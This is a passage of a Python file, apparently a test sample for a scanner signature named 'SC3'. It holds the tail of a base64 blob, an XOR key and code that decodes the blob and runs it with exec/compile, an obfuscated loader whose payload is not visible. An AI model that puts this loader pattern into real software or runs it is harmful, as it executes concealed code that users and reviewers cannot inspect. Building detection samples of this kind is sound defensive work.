Be/wgUNZnZmRZxwNy0hd2e1esEh6wZUtYfutFNOkgXxd/7yZQpWwDPTKubx7SJ0tYc+osX/4xZkV94ioWpE8zXnSuEGHjJFRSTdFvA7BlG2hN4y5X4xpmFSiEbx6tZVRWe+BnF4c="
_K = bytes.fromhex("4f3e8d453937128e")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    raw = base64.b64decode(_BLOB)
    return _xor(raw, _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
